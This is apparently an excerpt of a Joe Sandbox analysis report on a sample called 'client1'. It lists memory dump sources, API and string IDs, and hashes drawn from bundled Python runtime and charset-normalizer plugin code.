                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocErr_$Arg_ContextLong_OccurredParseSsize_tStringTupleVar_
                                                    • String ID: optional arg must be an integer
                                                    • API String ID: 983638023-4289973456
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: internal error in PyDec_ToIntegralValue$optional argument must be a context$|OO
                                                    • API String ID: 3219279049-179024453
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: internal error in PyDec_ToIntegralExact$optional argument must be a context$|OO
                                                    • API String ID: 3219279049-1730305842
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: FromStringUnicode_$S_snprintfSizeSubtypeType_memcpy
                                                    • String ID: $%04X
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627B81
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: String$CompareUnicode_With$AttrErr_GenericObject_
                                                    • String ID: context attributes cannot be deleted$flags$traps
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentErr_FromLongLong_OccurredReadyUnicode_
                                                    • String ID: a unicode character$argument$mirrored
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Arg_ArgumentErr_FromLongLong_OccurredReadyUnicode_
                                                    • String ID: a unicode character$argument$combining
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_end
                                                    • String ID:
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$p$p
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                    • String ID:
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0$0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_word_count' cannot be deleted$attribute '_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    APIs
                                                    Strings
                                                    • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted, xrefs: 00007FFBAB497E6C
                                                    • int, xrefs: 00007FFBAB497EF0
                                                    • attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB497DF8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count' cannot be deleted$attribute '_successive_upper_lower_count' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                    • API String ID: 1450464846-2022335554
                                                    • Opcode ID: fdb480920a9c7451cec282b0e84ab22eb2604cbd690f3a3138818415a15115d6
                                                    • Instruction ID: 8ecad50d3eb445d613da023ee3fa9e0c248c3d5162aeacc8783d5f24d690505d
                                                    • Opcode Fuzzy Hash: fdb480920a9c7451cec282b0e84ab22eb2604cbd690f3a3138818415a15115d6
                                                    • Instruction Fuzzy Hash: DF3141B1F1A60281EE96DB36E4963BD2360EF94B94F688135DE3D067F5DE2CD4958300
                                                    APIs
                                                    Strings
                                                    • attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB497F28
                                                    • int, xrefs: 00007FFBAB498020
                                                    • 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted, xrefs: 00007FFBAB497F9C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_successive_upper_lower_count_final' cannot be deleted$attribute '_successive_upper_lower_count_final' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-528010561
                                                    • Opcode ID: defae08e7b3a0dd3c431b0c8500a5d264029df500944186d54015f502eff64ef
                                                    • Instruction ID: 2b68e55dfaf7f6f6058ef9397f7576d040c6c5d21385788982bbfa244274f3f8
                                                    • Opcode Fuzzy Hash: defae08e7b3a0dd3c431b0c8500a5d264029df500944186d54015f502eff64ef
                                                    • Instruction Fuzzy Hash: 0D316FB1B1A50282EE46DB3AE4952BD2790EF84B94F589131EE7D077F5DF2CD4858300
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB494D10
                                                    • 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted, xrefs: 00007FFBAB494C8C
                                                    • attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB494C18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_punctuation_count' cannot be deleted$attribute '_punctuation_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                    • API String ID: 1450464846-1459665959
                                                    • Opcode ID: 9e31c213de300c1c91f799274bfbd503a1e836ef80330a027f4a639cda506582
                                                    • Instruction ID: ac28138c42f24396017c4f120add8e2f2507e6557bdc48855afdff1346105a07
                                                    • Opcode Fuzzy Hash: 9e31c213de300c1c91f799274bfbd503a1e836ef80330a027f4a639cda506582
                                                    • Instruction Fuzzy Hash: 1D318EA1B1A50285EE56DB3AE4952BD2390EF84B94F598231DE3D077F5DE2DD884C340
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB495FC0
                                                    • attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB495EC8
                                                    • 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB495F3C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                    • API String ID: 1450464846-543361526
                                                    • Opcode ID: 9bcf1ef78a725aaeeef43bd59b6ac542a859ae93bbca7b23511126d1c23ff142
                                                    • Instruction ID: cb22b0b95ddb9f2726b534e5dda2d3f99839c8415a4a35417c9b157c5e60d87c
                                                    • Opcode Fuzzy Hash: 9bcf1ef78a725aaeeef43bd59b6ac542a859ae93bbca7b23511126d1c23ff142
                                                    • Instruction Fuzzy Hash: 483182B1F1AA0281EE56DB36E49527D23A0FF84BA4F588231DE7E467F5DE2CD4958300
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB497DC0
                                                    • attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FFBAB497CC8
                                                    • 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted, xrefs: 00007FFBAB497D3C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted$attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined$int
                                                    • API String ID: 1450464846-2037488444
                                                    • Opcode ID: 5b1ffb8ff21230ac9e4d41d12f10005ed943449f8ea347bcad047da562003861
                                                    • Instruction ID: 49ee3cebe86cb2bc57c84e49affb503e802db2b16165813fa343fd3780e4e041
                                                    • Opcode Fuzzy Hash: 5b1ffb8ff21230ac9e4d41d12f10005ed943449f8ea347bcad047da562003861
                                                    • Instruction Fuzzy Hash: C53160A1B1A50282EE56DB36E4952BD2760FF84B94F588231DE7E077F6DF2CD4948300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-3920090044
                                                    • Opcode ID: 716bc62510ac8dda9762ecc1e7d0d488a86fd9f5daba0dbbae311ce027f2b779
                                                    • Instruction ID: 52687b18208ac15a343e3c7c9868982f0cb6b69c037f4c70fbbeeb3b0f5f4a3a
                                                    • Opcode Fuzzy Hash: 716bc62510ac8dda9762ecc1e7d0d488a86fd9f5daba0dbbae311ce027f2b779
                                                    • Instruction Fuzzy Hash: DB316FA1F1A50281FE46DB36E4D52BD2390EF84B94F589135DE7E067B6DF2DE8858300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'UnprintablePlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'UnprintablePlugin' undefined$int
                                                    • API String ID: 1450464846-2596148235
                                                    • Opcode ID: 2d1020cd279b47584a275813fcdef8f797012f73d456c9dd67c63cf5583baef3
                                                    • Instruction ID: d783a9449eb9a915126923f650c97703e0b0f354e29967fa3917933d66c84ef9
                                                    • Opcode Fuzzy Hash: 2d1020cd279b47584a275813fcdef8f797012f73d456c9dd67c63cf5583baef3
                                                    • Instruction Fuzzy Hash: 943160B1F1A60282EE56DB36E49527D23A0EF84BA4F588231DE7E067F5DE2CD4948300
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB494F70
                                                    • attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FFBAB494E78
                                                    • 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FFBAB494EEC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                    • API String ID: 1450464846-4240200891
                                                    • Opcode ID: 78741dcd6c4160e9c56fef5f28cb7a947163db393939fc1ad185ddcfec3d076a
                                                    • Instruction ID: 66517c4ff7f8033c55eab588ab3178e01699dce60dce227c714f8b8553c49564
                                                    • Opcode Fuzzy Hash: 78741dcd6c4160e9c56fef5f28cb7a947163db393939fc1ad185ddcfec3d076a
                                                    • Instruction Fuzzy Hash: 69318FA1F1A50281EE66DB36E4952BD2360EF88BA4F488231DE3D077F5DE2CD884C340
                                                    APIs
                                                    Strings
                                                    • int, xrefs: 00007FFBAB495E90
                                                    • attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FFBAB495D98
                                                    • 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted, xrefs: 00007FFBAB495E0C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_successive_count' cannot be deleted$attribute '_successive_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                    • API String ID: 1450464846-1864222365
                                                    • Opcode ID: ede0fe6ae653843410b6476b536458421e0c0394d7e32887f4812a8ca2613d72
                                                    • Instruction ID: c9334a92d1d7c7b436752dc0bf9dd7da6ff7e9ea27abb3cb5162c7db1f1eadd2
                                                    • Opcode Fuzzy Hash: ede0fe6ae653843410b6476b536458421e0c0394d7e32887f4812a8ca2613d72
                                                    • Instruction Fuzzy Hash: 563161B1F1A60291EE46DB36E4952BD2360FF94B94F688235DE3D467F5DE2DD8848300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_symbol_count' cannot be deleted$attribute '_symbol_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                    • API String ID: 1450464846-2291034628
                                                    • Opcode ID: c2e24b558124de55cf48d8667fda7d02b9c15b91cbe80d004c2bd506434f8363
                                                    • Instruction ID: 2fbe81789120fa4d5da842fb530dd6f7e0230641bb1fd46c671a5442f2f25755
                                                    • Opcode Fuzzy Hash: c2e24b558124de55cf48d8667fda7d02b9c15b91cbe80d004c2bd506434f8363
                                                    • Instruction Fuzzy Hash: 79318FA5F1A50292EE66DB36E4952BD2360EF88B94F488231DE7D077F5DE2CE4948340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted$attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-3520798986
                                                    • Opcode ID: 60bbb626cce52f488fbb40c6ab4ac6f5130ec404c89593ac7919945a130b0fce
                                                    • Instruction ID: 37ccde9d49ca16a9ccf4750ada72c057827add13fe31c6a0259c5f062b3bba3f
                                                    • Opcode Fuzzy Hash: 60bbb626cce52f488fbb40c6ab4ac6f5130ec404c89593ac7919945a130b0fce
                                                    • Instruction Fuzzy Hash: 4D315CA1B1A50282EF56DB36E4D52BD2360EF88B94F588235EE7E067B5DE2CD4948300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_count' cannot be deleted$attribute '_foreign_long_count' of 'SuperWeirdWordPlugin' undefined$int
                                                    • API String ID: 1450464846-3135691889
                                                    • Opcode ID: 7d54ae8d25dbb77536147f2b5954e326a1cde14a89e02d91d4bda525f7568c68
